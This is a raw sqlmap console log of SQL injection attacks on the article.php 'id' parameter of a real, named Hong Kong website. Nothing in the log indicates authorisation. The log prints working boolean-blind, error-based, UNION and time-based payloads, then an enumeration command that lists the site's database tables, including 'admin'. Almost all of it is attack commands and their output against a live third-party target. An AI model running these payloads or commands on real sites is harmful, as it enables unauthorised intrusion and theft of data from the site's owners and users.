starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'